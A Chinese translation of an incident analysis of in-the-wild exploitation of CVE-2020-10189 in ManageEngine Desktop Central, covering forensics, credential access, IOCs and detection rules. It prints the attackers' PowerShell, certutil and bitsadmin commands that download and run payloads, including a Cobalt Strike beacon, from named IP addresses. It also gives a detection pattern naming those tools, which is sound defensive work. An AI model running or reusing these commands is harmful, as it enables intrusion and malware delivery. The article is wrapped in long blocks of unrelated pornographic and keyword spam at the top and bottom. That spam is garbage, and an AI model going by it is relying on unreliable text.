精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Desktop Central服務(wù)器RCE漏洞在野攻擊分析

安全 漏洞
Zoho ManageEngine Desktop Central 10允許遠(yuǎn)程執(zhí)行代碼,漏洞成因是FileStorage類的getChartImage中的不可信數(shù)據(jù)反序列化,此漏洞和CewolfServlet,MDMLogUploaderServlet Servlet有關(guān)。

0x01 漏洞披露

在研究Desktop Central漏洞的過程中,我們在推特上找到了一位研究人員的帖子,該研究人員于2020年3月5日披露了Desktop Central的RCE漏洞。

Zoho ManageEngine Desktop Central 10允許遠(yuǎn)程執(zhí)行代碼,漏洞成因是FileStorage類的getChartImage中的不可信數(shù)據(jù)反序列化,此漏洞和CewolfServlet,MDMLogUploaderServlet Servlet有關(guān)。

對CVE-2020-10189的研究還顯示,可以在??Shodan??上搜索易受攻擊的Desktop Central服務(wù)器。

在公網(wǎng)發(fā)現(xiàn)的威脅是有可疑的PowerShell下載通訊錄,該通訊錄包含下載文件的說明。

最早威脅活動之一是一些可疑的PowerShell下載命令。該命令包含指令,以下載install.bat并storesyncsvc.dll到C:\Windows\Temp,然后立即執(zhí)行install.bat(圖3)。

cmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/install.bat','C:\Windows\Temp\install.bat')&powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98.220:12345/test/storesyncsvc.dll','C:\Windows\Temp\storesyncsvc.dll')&C:\Windows\Temp\install.bat
esktop Central服務(wù)器RCE漏洞在野攻擊分析

圖3-可疑的PowerShell下載命令

該install.bat腳本包含storesyncsvc.dll作為服務(wù)安裝在系統(tǒng)上的說明。(圖4)。

??

圖4-Install.bat的內(nèi)容

在運行PowerShell命令后,我們觀察到安裝了服務(wù)名稱StorSyncSvc和顯示名稱為Storage Sync Service(圖5)的新服務(wù)。

??


圖5-安裝Storage Sync Service

VirusTotal上的查詢結(jié)果表明,一些檢測引擎已經(jīng)歸類storesyncsvc.dll為惡意軟件。

??https://www.virustotal.com/gui/file/f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c/details??

0x02 利用過程跟蹤識別漏洞利用

此RCE漏洞已于2020年3月5日通過Twitter公開。

回顧Sysmon流程創(chuàng)建事件,表明C:\ManageEngine\DesktopCentral_Server\jre\bin\java.exe流程是負(fù)責(zé)執(zhí)行PowerShell Download命令的流程(圖6)。

??

圖6-ParentImage負(fù)責(zé)PowerShell的下載

查看內(nèi)存中的進程,我們還觀察到Desktop Central java.exe應(yīng)用程序cmd.exe和2.exe之間的父/子進程關(guān)系(圖7)。

??

圖7- java.exe父/子進程關(guān)系

0x03 利用文件系統(tǒng)識別漏洞利用

為了進一步驗證我們的理論,我們將從受影響的Desktop Central服務(wù)器收集的信息與已發(fā)布的POC進行了比較,確定攻擊者可能利用了CVE-2020-10189漏洞在此易受攻擊的系統(tǒng)上運行代碼。

通過文件系統(tǒng)時間軸分析,我們確定遍歷文件寫可能已在具有文件名_chart(圖8)和logger.zip(圖9)的系統(tǒng)上發(fā)生   。

??

 圖8- _chart文件系統(tǒng)分析

??

圖9- logger.zip文件系統(tǒng)分析

這些文件名也在??@Steventseeley???發(fā)布的POC中進行了??引用??(圖10)。

??

圖10-POC中對_chart和logger.zip的引用,參考:??https??? : ??//srcincite.io/pocs/src-2020-0011.py.txt??

0x04 引入系統(tǒng)命令

在隨后的流程創(chuàng)建日志中,cmd.exe使用certutil.exe命令來下載和執(zhí)行2.exe(圖11),進一步的分析表明,很有可能   2.exe可能是C2工具Cobalt Strike的一部分。

cmd /c certutil -urlcache -split -f http://91.208.184.78/2.exe && 2.exe

??

圖11-Certutil命令

OSINT透露2.exe已被VirusTotal上的多個檢測引擎識別為惡意軟件:??https???:??//www.virustotal.com/gui/file/d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309/details??

利用app.any.run沙箱(圖12)和對惡意軟件的內(nèi)存分析,進一步證實2.exe托管Cobalt Strike Beacon payload的可能性。

??

圖12- 2.exe被判定為惡意軟件

??https://any.run/report/d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309/e65dd4ff-60c6-49a4-8e6d-94c6c80a74b6??

我們對已知惡意軟件2.exe所使用的所有內(nèi)存段進行了yara掃描,yara掃描結(jié)果進一步支持了2.exe在其他幾種可能的惡意軟件簽名的理論(圖13)。

??

圖13-Yarascan掃描結(jié)果

利用Volatility的惡意插件,我們確定了幾個可能存在代碼注入跡象的內(nèi)存部分,我們對另一個由malfind轉(zhuǎn)儲的內(nèi)存段進行了yara掃描,進一步證實了我們的猜想。

在下面的記錄中可以看到整個過程(圖14)。

(原文中查看完整過程

圖14-Yarascan驗證結(jié)果

然后,我們檢查了malfind的輸出以獲得代碼注入的證據(jù),并確定了其中的可疑內(nèi)存部分svchost.exe(圖15)。OSINT的研究使我們找到了一位研究人員,該研究人員對惡意軟件進行了逆向,并找到了負(fù)責(zé)向其中注入代碼的部分svchost.exe(圖16)。

??

 圖15-對包含注入代碼的svchost的分析

??

圖16-@VK_Intel的分析顯示了可能的注入功能

參考:

Desktop Central服務(wù)器RCE漏洞在野攻擊分析

在攻擊結(jié)束后,我們觀察到了惡意的Bitsadmin命令,其中包含install.bat從66.42.96.220可疑端口12345進行轉(zhuǎn)移的指令。

我們的分析師觀察到,bitsadmin命令正在Desktop Central服務(wù)器上運行,該命令包含在PowerShell下載命令中調(diào)用的相同IP地址,端口和相同的install.bat文件(圖17)。

cmd /c bitsadmin /transfer bbbb http://66.42.98.220:12345/test/install.bat C:\Users\Public\install.bat

??

圖17-Bitsadmin命令

0x05 訪問憑證

我們還觀察到了潛在的憑證訪問活動。攻擊者執(zhí)行憑據(jù)轉(zhuǎn)儲的常用技術(shù)是使用惡意進程(SourceImage)訪問另一個進程(TargetImage),最常見的是將lsass.exe作為目標(biāo),因為它通常包含敏感信息,例如帳戶憑據(jù)。

在這里,我們觀察到SourceImage 2.exe訪問TargetImage lsass.exe(圖18)。Cobalt Strike Beacon包含類似于??Mimikatz的??本機憑證轉(zhuǎn)儲功能,使用此功能的唯一必要條件是攻擊者具有的SYSTEM特權(quán),以下事件提供了充分的證據(jù)證明憑證訪問的風(fēng)險很高。

??

圖18- 2.exe訪問lsass.exe

在對這種入侵進行分析的過程中,我們向Eric Zimmerman的??KAPE???工具添加了一些收集目標(biāo)功能,以將??相關(guān)日志??添加到分類工作中。

工具地址:??https://binaryforay.blogspot.com/2019/02/introducing-kape.html??

針對相關(guān)日志的用法示例:

kape.exe --tsource C: --tdest c:\temp\tout --tflush --target ManageEngineLogs

Sigma項目的Florian Roth創(chuàng)建了一個簽名來檢測攻擊者利用的某些技術(shù):

??https://github.com/Neo23x0/sigma/blob/master/rules/windows/process_creation/win_exploit_cve_2020_10189.yml??

我們對該攻擊的分析還發(fā)現(xiàn),在進程創(chuàng)建日志中基于命令行活動進行檢測將很有價值:

ParentImage | endswith: 
'DesktopCentral_Server\jre\bin\java.exe'
CommandLine | contains:
'*powershell*'
'*certutil*'
'*bitsadmin*'

0x06 IOCs

·Storesyncsvc.dll

· MD5: 5909983db4d9023e4098e56361c96a6f

· SHA256: f91f2a7e1944734371562f18b066f193605e07223aab90bd1e8925e23bbeaa1c

·Install.bat

· MD5: 7966c2c546b71e800397a67f942858d0

· SHA256: de9ef08a148305963accb8a64eb22117916aa42ab0eddf60ccb8850468a194fc

·2.exe

· MD5: 3e856162c36b532925c8226b4ed3481c

· SHA256: d854f775ab1071eebadc0eb44d8571c387567c233a71d2e26242cd9a80e67309

· 66[.]42[.]98[.]220

· 91[.]208[.]184[.]78

· 74[.]82[.]201[.]8

本文翻譯自:https://blog.reconinfosec.com/analysis-of-exploitation-cve-2020-10189/ https://nvd.nist.gov/vuln/detail/CVE-2020-10189#vulnCurrentDescriptionTitle如若轉(zhuǎn)載,請注明原文地址


責(zé)任編輯:姜華 來源: 嘶吼網(wǎng)
相關(guān)推薦

2025-03-05 15:10:13

2024-01-08 19:18:17

2021-03-16 09:45:25

漏洞攻擊RCE

2009-08-05 22:19:15

2021-09-08 18:23:34

漏洞攻擊Confluence

2014-10-31 09:12:41

2009-05-22 10:06:25

2009-10-10 17:40:34

2021-02-09 10:31:04

漏洞webWordPress F

2022-07-18 14:10:55

漏洞網(wǎng)絡(luò)攻擊

2012-02-17 09:47:50

2015-04-16 13:19:52

2015-09-01 10:33:53

2018-03-15 08:25:53

2021-04-16 11:01:28

ExchangeNSA漏洞

2023-02-20 14:46:55

2020-02-17 09:53:57

漏洞DDoS攻擊

2020-09-28 10:20:30

漏洞

2022-02-25 16:07:04

漏洞PHPWordPress
點贊
收藏

51CTO技術(shù)棧公眾號

黄色日韩网站| 日产精品久久久久久久性色| 1024精品久久久久久久久| 日韩区在线观看| 国产主播在线看| 国产三级在线免费观看| 国产尤物一区二区在线| 97久久超碰福利国产精品…| 久久亚洲无码视频| 国产亚洲久久| 欧美日韩一区二区免费视频| 亚洲欧洲免费无码| 男人天堂手机在线观看| 免费在线观看一区二区三区| 欧美日韩国产成人在线观看| 精品无码国产污污污免费网站| 日本免费一区二区三区等视频| 亚洲成av人影院在线观看网| 水蜜桃亚洲精品| 开心激情综合网| 久久国产成人午夜av影院| 午夜精品一区二区三区在线视| 超碰人人人人人人人| 巨人精品**| 91精品国产91久久久久久最新毛片| 久久视频这里有精品| 免费**毛片在线| 久久新电视剧免费观看| 国产精品夜夜夜一区二区三区尤| wwwwww在线观看| 亚洲精选久久| 九九久久国产精品| 一区二区三区影视| av在线不卡顿| 亚洲精品自拍视频| 在线精品视频播放| 久久天堂久久| 欧美精品国产精品| 人人爽人人av| 另类图片综合电影| 欧美午夜激情小视频| 真实国产乱子伦对白视频| 在线观看av黄网站永久| 久久色视频免费观看| 久久99久久精品国产| 人妻妺妺窝人体色www聚色窝| 精品写真视频在线观看 | 色在线免费观看| 一区二区三区四区五区视频在线观看| 亚洲人一区二区| h网站视频在线观看| 久久毛片高清国产| 美国av一区二区三区| 天堂资源最新在线| 成人av电影在线| 国产精品青青草| 亚洲精品久久久久久久久久 | 欧美91精品久久久久国产性生爱| 不卡视频免费播放| 国内一区在线| 三级在线电影| 国产午夜精品久久久久久久 | 婷婷六月综合网| 青青青青草视频| 国产不卡123| 精品动漫一区二区三区| 日本www在线播放| 玛雅亚洲电影| 欧美三级视频在线播放| 中文字幕亚洲乱码| 95精品视频| 欧美v国产在线一区二区三区| 黄色片子免费看| 91综合精品国产丝袜长腿久久| 精品免费国产二区三区| 中文字幕乱码一区| 免费看av成人| 日韩在线播放视频| 91精品国产高清一区二区三蜜臀| 欧美日一区二区在线观看 | 亚洲精品一区av| 日韩一区二区麻豆国产| 中文字幕18页| 国产99久久| 日韩视频在线免费| 国产亚洲第一页| 日韩不卡免费视频| 亚洲最大av网站| 亚洲人妻一区二区三区| 国产精品欧美精品| 国产综合中文字幕| 国产91在线精品| 精品三级在线观看| 老熟妇一区二区| 91精品国产自产拍在线观看蜜| 久久久久国产一区二区三区| 中文字幕免费观看| 国产乱码精品一区二区三区忘忧草| 国产日韩精品久久| 麻豆视频在线免费观看| 午夜av电影一区| 欧美日韩一区二区三区69堂| 成人另类视频| 中文字幕综合一区| 日韩久久久久久久久| 美洲天堂一区二卡三卡四卡视频| 99视频网站| 9i精品一二三区| 亚洲va欧美va人人爽| gogogo高清免费观看在线视频| 岛国精品一区| 日韩最新在线视频| 国产成人无码av| 国产sm精品调教视频网站| 小说区图片区图片区另类灬| 久草在线资源站资源站| 欧美日韩一区不卡| 亚洲最大的黄色网| 欧美激情无毛| 国产在线精品播放| a视频网址在线观看| 岛国av在线不卡| 中文字幕avav| 国产精品成人一区二区不卡| 日产精品99久久久久久| 风流老熟女一区二区三区| 亚洲欧美怡红院| 激情综合网婷婷| 国产亚洲成av人片在线观黄桃| 日韩一区二区av| 欧美日韩a v| 99热在这里有精品免费| 欧美国产视频一区| 嫩呦国产一区二区三区av| 三级精品视频久久久久| 啪啪小视频网站| 久久久久久黄色| 欧美成人高潮一二区在线看| 一区二区三区在线资源| 不卡毛片在线看| 国产伦精品一区二区三区四区| 久久精品视频在线看| 少妇性饥渴无码a区免费| 好吊妞视频这里有精品| 久久免费视频在线观看| 国产伦精品一区二区三区视频黑人 | 久久久久久久久久久久久女国产乱| 欧美大黑帍在线播放| 精品视频在线观看免费观看 | 成年人在线免费看片| 蜜桃伊人久久| 色播亚洲婷婷| 粉嫩av一区二区三区四区五区| 亚洲天堂男人天堂| 久久久久久久久久一级| 久久久久国产精品免费免费搜索| 女人扒开屁股爽桶30分钟| 自拍偷拍一区| 国产激情久久久| aⅴ在线视频男人的天堂| 欧美手机在线视频| 91传媒免费观看| 国产精品一二二区| 国产精品久久..4399| 日韩极品在线| 国产精品h在线观看| av在线中文| 欧美精品三级在线观看| 日本a级片视频| 成人福利在线看| 国产91对白刺激露脸在线观看| 精品一区亚洲| 成人福利在线视频| 神马午夜伦理不卡| 日韩精品视频在线| 免费在线不卡av| 中文字幕字幕中文在线中不卡视频| 欧美国产在线一区| a91a精品视频在线观看| 日韩精品欧美一区二区三区| 婷婷久久免费视频| 久久久视频在线| 精品视频一二区| 91麻豆精品国产91久久久久久| 麻豆changesxxx国产| 2024国产精品| 国产日韩欧美久久| 在线看片日韩| 美女视频久久黄| 久热这里只精品99re8久| a视频在线免费看| 亚洲精品按摩视频| 一级黄色片在线观看| 亚洲一区电影777| 特级西西www444人体聚色 | 中文不卡在线| 久久艹中文字幕| 91精品网站在线观看| 午夜精品久久久久久99热| 999在线视频| 精品剧情v国产在线观看在线| 69国产精品视频免费观看| 中文字幕亚洲精品在线观看| 国产老熟女伦老熟妇露脸| 蜜桃视频在线一区| 国产 日韩 亚洲 欧美| 99久久精品国产亚洲精品| 精品国产一区二区三区四区精华| 中文字幕日本一区| 日韩av片电影专区| 另类视频在线| 久久亚洲精品视频| 欧美日韩国产中文字幕在线| 精品人在线二区三区| 影音先锋黄色网址| 色视频成人在线观看免| 精品处破女学生| 一区精品在线播放| 国产免费看av| 99热这里都是精品| 在线成人免费观看| 日韩在线视频免费看| 91欧美激情一区二区三区成人| 免费黄频在线观看| 蜜臀av一区二区| 日本成人中文字幕在线| 最新成人av网站| 久久久久福利视频| 国产精品久久天天影视| 日韩av在线电影观看| 欧美wwwwww| 国内精品久久国产| 都市激情亚洲欧美| 国产经典一区二区三区| 精品亚洲二区| 成人网在线观看| 久久69成人| 国产精品揄拍一区二区| 欧美国产日韩电影| 国产成人精品久久久| 蜜桃视频m3u8在线观看| 性欧美视频videos6一9| 免费看电影在线| 欧美高清在线播放| 欧美高清另类hdvideosexjaⅴ| 久久精品久久久久久国产 免费| 午夜伦全在线观看| www.日韩免费| 日本中文字幕视频在线| 久久精品成人一区二区三区 | 美女国内精品自产拍在线播放| av在线资源站| 北条麻妃一区二区三区中文字幕| av资源种子在线观看| 日韩三级成人av网| 成人video亚洲精品| 久久99精品久久久久久琪琪| 污视频网站免费在线观看| 欧美寡妇偷汉性猛交| 国产激情视频在线看| 2019亚洲男人天堂| 影视一区二区三区| 国产精品久久久久久一区二区| 成人精品一区二区三区电影| 国产一区二区在线免费视频| 99久久久国产| 波多野结衣久草一区| 澳门精品久久国产| 久久久99爱| 四虎国产精品免费观看| 秋霞在线一区二区| 影音先锋在线一区| 四虎永久在线精品无码视频| 美国十次了思思久久精品导航| 免费黄频在线观看| 白白色 亚洲乱淫| av永久免费观看| 亚洲美女免费视频| 日本三级小视频| 欧美色中文字幕| 亚洲国产精品suv| 亚洲日本欧美日韩高观看| 日本高清视频在线观看| 欧美黑人xxx| 天天综合网站| 97超碰人人模人人爽人人看| 日韩av网站在线免费观看| 亚洲国产日韩欧美| 狠狠入ady亚洲精品| 国产 福利 在线| 另类成人小视频在线| 91人人澡人人爽| 国产视频在线观看一区二区三区| www.超碰在线观看| 一本一道综合狠狠老| 国产色综合视频| 亚洲女人被黑人巨大进入| 好吊日视频在线观看| 欧美性受xxx| 国产精品va视频| 蜜桃狠狠色伊人亚洲综合网站| 亚洲av激情无码专区在线播放| 亚洲精品免费在线| 久久永久免费视频| 欧美成人午夜电影| www.国产精品.com| 国产91精品久久久久| 日本久久伊人| 亚洲人一区二区| 久久在线精品| 久久国产劲爆∧v内射| 欧美韩国一区二区| 午夜毛片在线观看| 精品福利av导航| 成人在线观看免费网站| 国产成人精品av在线| 欧美影院天天5g天天爽| 国产精品自拍合集| 精品一区二区三区免费观看 | 亚洲高清极品| 奇米777四色影视在线看| 免费观看30秒视频久久| aa片在线观看视频在线播放| 亚洲日本在线视频观看| 国产免费a视频| 亚洲欧美国产精品| 美女av在线免费看| 国产精品一 二 三| 黄色在线成人| 91精品国产高清91久久久久久 | 国产精品久久久久久人| 亚洲第一综合天堂另类专| 青草青在线视频| 91影视免费在线观看| 9999国产精品| 玖玖爱视频在线| 国产精品久久久久久亚洲伦 | 久久综合中文色婷婷| 99国产精品久久久久久久成人热| 少妇献身老头系列| 亚洲综合无码一区二区| 国产手机精品视频| 欧美精品免费在线观看| 高清久久一区| 操bbb操bbb| 国产成人丝袜美腿| 男女免费视频网站| 精品国产露脸精彩对白| 国产极品人妖在线观看| 国产伦理一区二区三区| 亚洲清纯自拍| 精品人妻一区二区三区日产乱码卜| 午夜婷婷国产麻豆精品| 午夜av免费观看| 琪琪第一精品导航| 狠狠色狠狠色综合婷婷tag| 成人性做爰aaa片免费看不忠| 国产色综合久久| 又骚又黄的视频| 欧美裸体xxxx极品少妇| 911亚洲精品| 男女激情无遮挡| 久久精品夜色噜噜亚洲aⅴ| 亚洲精品一区二三区| 日日骚av一区| 91精品啪在线观看国产手机| 欧美乱大交xxxxx潮喷l头像| 99精品国产一区二区三区不卡| 黄色av一级片| 日韩视频在线免费观看| 日韩中文字幕| 男人靠女人免费视频网站| 国产欧美日韩激情| 97超碰人人模人人人爽人人爱| 精品中文字幕乱| 私拍精品福利视频在线一区| 手机看片福利日韩| 亚洲男人天堂av网| 亚州av在线播放| 国产日本欧美一区二区三区| 最新欧美人z0oozo0| 网站免费在线观看| 欧美日本精品一区二区三区| 黄色影院在线看| 日韩av高清| 国产ts人妖一区二区| 国产一级免费视频| 久久国产精品久久久久| 香蕉视频一区二区三区| 亚洲涩涩在线观看| 激情久久av一区av二区av三区| av在线播放免费| 91久色国产| 日韩国产欧美视频| 久久精品国产亚洲av高清色欲| 一区二区三区视频观看| 亚洲国产中文在线二区三区免| 农村妇女精品一二区| 一个色综合av| 日本中文字幕在线2020|